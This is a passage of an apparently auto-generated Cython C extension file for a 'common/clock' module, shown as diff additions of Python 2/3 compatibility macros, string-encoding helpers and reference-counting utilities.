!PyUnicode_CheckExact(b)))) ? PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) +#else + #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) +#endif +#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) + #define PyObject_ASCII(o) PyObject_Repr(o) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBaseString_Type PyUnicode_Type + #define PyStringObject PyUnicodeObject + #define PyString_Type PyUnicode_Type + #define PyString_Check PyUnicode_Check + #define PyString_CheckExact PyUnicode_CheckExact +#ifndef PyObject_Unicode + #define PyObject_Unicode PyObject_Str +#endif +#endif +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) + #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) +#else + #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) + #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #define __Pyx_PySequence_ListKeepNew(obj)\ + (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? __Pyx_NewRef(obj) : PySequence_List(obj)) +#else + #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) +#endif +#ifndef PySet_CheckExact + #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) +#endif +#if PY_VERSION_HEX >= 0x030900A4 + #define __Pyx_SET_REFCNT(obj, refcnt) Py_SET_REFCNT(obj, refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) +#else + #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) +#endif +#if CYTHON_ASSUME_SAFE_MACROS + #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) +#else + #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyIntObject PyLongObject + #define PyInt_Type PyLong_Type + #define PyInt_Check(op) PyLong_Check(op) + #define PyInt_CheckExact(op) PyLong_CheckExact(op) + #define __Pyx_Py3Int_Check(op) PyLong_Check(op) + #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) + #define PyInt_FromString PyLong_FromString + #define PyInt_FromUnicode PyLong_FromUnicode + #define PyInt_FromLong PyLong_FromLong + #define PyInt_FromSize_t PyLong_FromSize_t + #define PyInt_FromSsize_t PyLong_FromSsize_t + #define PyInt_AsLong PyLong_AsLong + #define PyInt_AS_LONG PyLong_AS_LONG + #define PyInt_AsSsize_t PyLong_AsSsize_t + #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask + #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask + #define PyNumber_Int PyNumber_Long +#else + #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) + #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBoolObject PyLongObject +#endif +#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY + #ifndef PyUnicode_InternFromString + #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) + #endif +#endif +#if PY_VERSION_HEX < 0x030200A4 + typedef long Py_hash_t; + #define __Pyx_PyInt_FromHash_t PyInt_FromLong + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t +#else + #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t +#endif +#if CYTHON_USE_ASYNC_SLOTS + #if PY_VERSION_HEX >= 0x030500B1 + #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods + #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) + #else + #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) + #endif +#else + #define __Pyx_PyType_AsAsync(obj) NULL +#endif +#ifndef __Pyx_PyAsyncMethodsStruct + typedef struct { + unaryfunc am_await; + unaryfunc am_aiter; + unaryfunc am_anext; + } __Pyx_PyAsyncMethodsStruct; +#endif + +#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) + #if !defined(_USE_MATH_DEFINES) + #define _USE_MATH_DEFINES + #endif +#endif +#include +#ifdef NAN +#define __PYX_NAN() ((float) NAN) +#else +static CYTHON_INLINE float __PYX_NAN() { + float value; + memset(&value, 0xFF, sizeof(value)); + return value; +} +#endif +#if defined(__CYGWIN__) && defined(_LDBL_EQ_DBL) +#define __Pyx_truncl trunc +#else +#define __Pyx_truncl truncl +#endif + +#define __PYX_MARK_ERR_POS(f_index, lineno) \ + { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } +#define __PYX_ERR(f_index, lineno, Ln_error) \ + { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } + +#ifdef CYTHON_EXTERN_C + #undef __PYX_EXTERN_C + #define __PYX_EXTERN_C CYTHON_EXTERN_C +#elif defined(__PYX_EXTERN_C) + #ifdef _MSC_VER + #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") + #else + #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. + #endif +#else + #define __PYX_EXTERN_C extern "C++" +#endif + +#define __PYX_HAVE__common__clock +#define __PYX_HAVE_API__common__clock +/* Early includes */ +#include +#include +#include +#ifdef _OPENMP +#include +#endif /* _OPENMP */ + +#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) +#define CYTHON_WITHOUT_ASSERTIONS +#endif + +typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; + const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; + +#define __PYX_DEFAULT_STRING_ENCODING_IS_ASCII 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && __PYX_DEFAULT_STRING_ENCODING_IS_UTF8) +#define __PYX_DEFAULT_STRING_ENCODING "" +#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString +#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#define __Pyx_uchar_cast(c) ((unsigned char)c) +#define __Pyx_long_cast(x) ((long)x) +#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ + (sizeof(type) < sizeof(Py_ssize_t)) ||\ + (sizeof(type) > sizeof(Py_ssize_t) &&\ + likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX) &&\ + (!is_signed || likely(v > (type)PY_SSIZE_T_MIN ||\ + v == (type)PY_SSIZE_T_MIN))) ||\ + (sizeof(type) == sizeof(Py_ssize_t) &&\ + (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX))) ) +static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { + return (size_t) i < (size_t) limit; +} +#if defined (__cplusplus) && __cplusplus >= 201103L + #include + #define __Pyx_sst_abs(value) std::abs(value) +#elif SIZEOF_INT >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) abs(value) +#elif SIZEOF_LONG >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) labs(value) +#elif defined (_MSC_VER) + #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) +#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define __Pyx_sst_abs(value) llabs(value) +#elif defined (__GNUC__) + #define __Pyx_sst_abs(value) __builtin_llabs(value) +#else + #define __Pyx_sst_abs(value) ((value<0) ? -value : value) +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); +#define __Pyx_PyByteArray_FromString(s) PyByteArray_FromStringAndSize((const char*)s, strlen((const char*)s)) +#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) +#define __Pyx_PyBytes_FromString PyBytes_FromString +#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); +#if PY_MAJOR_VERSION < 3 + #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#else + #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize +#endif +#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) +#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) +#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) +#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) +#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) +{ + const wchar_t *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#else +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) +{ + const Py_UNICODE *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#endif +#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) +#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) +#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode +#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode +#define __Pyx_NewRef(obj) (Py_INCREF(obj), obj) +#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); +#define __Pyx_PySequence_Tuple(obj)\ + (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); +#if CYTHON_ASSUME_SAFE_MACROS +#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) +#else +#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) +#endif +#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Long(x)) +#else +#define __Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Int(x)) +#endif +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_VERSION_HEX >= 0x030C00A7 + #ifndef _PyLong_SIGN_MASK + #define _PyLong_SIGN_MASK 3 + #endif + #ifndef _PyLong_NON_SIZE_BITS + #define _PyLong_NON_SIZE_BITS 3 + #endif + #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) + #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) + #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) + #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) + #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_SignedDigitCount(x)\ + ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) + #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) + #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) + #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) + #else + #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) + #endif + typedef Py_ssize_t __Pyx_compact_pylong; + typedef size_t __Pyx_compact_upylong; + #else // Py < 3.12 + #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) + #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) + #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) + #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 0 : __Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) + #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) + #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) + #define __Pyx_PyLong_CompactValue(x)\ + ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) + typedef sdigit __Pyx_compact_pylong; + typedef digit __Pyx_compact_upylong; + #endif + #if PY_VERSION_HEX >= 0x030C00A5 + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) + #else + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) + #endif +#endif +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII +static int __Pyx_sys_getdefaultencoding_not_ascii; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + PyObject* ascii_chars_u = NULL; + PyObject* ascii_chars_b = NULL; + const char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + if (strcmp(default_encoding_c, "ascii") == 0) { + __Pyx_sys_getdefaultencoding_not_ascii = 0; + } else { + char ascii_chars[128]; + int c; + for (c = 0; c < 128; c++) { + ascii_chars[c] = (char) c; + } + __Pyx_sys_getdefaultencoding_not_ascii = 1; + ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); + if (!ascii_chars_u) goto bad; + ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); + if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { + PyErr_Format( + PyExc_ValueError, + "This module compiled with c_string_encoding=ascii, but default encoding '%.200s' is not a superset of ascii.", + default_encoding_c); + goto bad; + } + Py_DECREF(ascii_chars_u); + Py_DECREF(ascii_chars_b); + } + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + Py_XDECREF(ascii_chars_u); + Py_XDECREF(ascii_chars_b); + return -1; +} +#endif +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) +#else +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +static char* __PYX_DEFAULT_STRING_ENCODING; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); + if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; + strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + return -1; +} +#endif +#endif + + +/* Test for GCC > 2.95 */ +#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) + #define likely(x) __builtin_expect(!!(x), 1) + #define unlikely(x) __builtin_expect(!!(x), 0) +#else /* !__GNUC__ or GCC < 2.95 */ + #define likely(x) (x) + #define unlikely(x) (x) +#endif /* __GNUC__ */ +static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } + +#if !CYTHON_USE_MODULE_STATE +static PyObject *__pyx_m = NULL; +#endif +static int __pyx_lineno; +static int __pyx_clineno = 0; +static const char * __pyx_cfilenm = __FILE__; +static const char *__pyx_filename; + +/* #### Code section: filename_table ### */ + +static const char *__pyx_f[] = { + "common/clock.pyx", +}; +/* #### Code section: utility_code_proto_before_types ### */ +/* #### Code section: numeric_typedefs ### */ +/* #### Code section: complex_type_declarations ### */ +/* #### Code section: type_declarations ### */ + +/*--- Type declarations ---*/ +/* #### Code section: utility_code_proto ### */ + +/* --- Runtime support code (head) --- */ +/* Refnanny.proto */ +#ifndef CYTHON_REFNANNY + #define CYTHON_REFNANNY 0 +#endif +#if CYTHON_REFNANNY + typedef struct { + void (*INCREF)(void*, PyObject*, Py_ssize_t); + void (*DECREF)(void*, PyObject*, Py_ssize_t); + void (*GOTREF)(void*, PyObject*, Py_ssize_t); + void (*GIVEREF)(void*, PyObject*, Py_ssize_t); + void* (*SetupContext)(const char*, Py_ssize_t, const char*); + void (*FinishContext)(void**); + } __Pyx_RefNannyAPIStruct; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); + #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; +#ifdef WITH_THREAD + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + if (acquire_gil) {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + PyGILState_Release(__pyx_gilstate_save);\ + } else {\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + } + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } +#else + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) + #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() +#endif + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } + #define __Pyx_RefNannyFinishContext()\ + __Pyx_RefNanny->FinishContext(&__pyx_refnanny) + #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) + #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); }} while(0) + #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) + #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) +#else + #define __Pyx_RefNannyDeclarations + #define __Pyx_RefNannySetupContext(name, acquire_gil) + #define __Pyx_RefNannyFinishContextNogil() + #define __Pyx_RefNannyFinishContext() + #define __Pyx_INCREF(r) Py_INCREF(r) + #define __Pyx_DECREF(r) Py_DECREF(r) + #define __Pyx_GOTREF(r) + #define __Pyx_GIVEREF(r) + #define __Pyx_XINCREF(r) Py_XINCREF(r) + #define __Pyx_XDECREF(r) Py_XDECREF(r) + #define __Pyx_XGOTREF(r) + #define __Pyx_XGIVEREF(r) +#endif +#define __Pyx_Py_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; Py_XDECREF(tmp);\ + } while (0) +#define __Pyx_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_XDECREF(tmp);\ + } while (0) +#define __Pyx_DECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_DECREF(tmp);\ + } while (0) +#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) +#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) + +/* TupleAndListFromArray.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); +static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); +#endif + +/* IncludeStringH.proto */ +#include + +/* BytesEquals.proto */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); + +/* UnicodeEquals.proto */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); + +/* fastcall.proto */ +#define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) +#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) +#define __Pyx_KwValues_VARARGS(args, nargs) NULL +#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) +#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) +#if CYTHON_METH_FASTCALL + #define __Pyx_Arg_FASTCALL(args, i) args[i] + #define __Pyx_NumKwargs_FASTCALL(kwds) PyTuple_GET_SIZE(kwds) + #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) + static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); + #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) +#else + #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS + #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS + #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS + #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS + #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS +#endif +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) +#else +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) +#endif + +/* IncludeStructmemberH.proto */ +#include + +/* FixUpExtensionType.proto */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); +#endif + +/* FetchSharedCythonModule.proto */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void); + +/* FetchCommonType.proto */ +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); +#else +static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); +#endif + +/* PyMethodNew.proto */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { + CYTHON_UNUSED_VAR(typ); + if (!self) + return __Pyx_NewRef(func); + return PyMethod_New(func, self); +} +#else + #define __Pyx_PyMethod_New PyMethod_New +#endif + +/* PyObjectGetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) +#endif + +/* PyVectorcallFastCallDict.proto */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); +#endif + +/* CythonFunctionShared.proto */ +#define __Pyx_CyFunction_USED +#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 +#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 +#define __Pyx_CYFUNCTION_CCLASS 0x04 +#define __Pyx_CYFUNCTION_COROUTINE 0x08 +#define __Pyx_CyFunction_GetClosure(f)\ + (((__pyx_CyFunctionObject *) (f))->func_closure) +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_CyFunction_GetClassObj(f)\ + (((__pyx_CyFunctionObject *) (f))->func_classobj) +#else + #define __Pyx_CyFunction_GetClassObj(f)\ + ((PyObject*) ((PyCMethodObject *) (f))->mm_class) +#endif +#define __Pyx_CyFunction_SetClassObj(f, classobj)\ + __Pyx__CyFunction_SetClassObj((__pyx_CyFunctionObject *) (f), (classobj)) +#define __Pyx_CyFunction_Defaults(type, f)\ + ((type *)(((__pyx_CyFunctionObject *) (f))->defaults)) +#define __Pyx_CyFunction_SetDefaultsGetter(f, g)\ + ((__pyx_CyFunctionObject *) (f))->defaults_getter = (g) +typedef struct { +#if PY_VERSION_HEX < 0x030900B1 + PyCFunctionObject func; +#else + PyCMethodObject func; +#endif +#if CYTHON_BACKPORT_VECTORCALL + __pyx_vectorcallfunc func_vectorcall; +#endif +#if PY_VERSION_HEX < 0x030500A0 + PyObject *func_weakreflist; +#endif + PyObject *func_dict; + PyObject *func_name; + PyObject *func_qualname; + PyObject 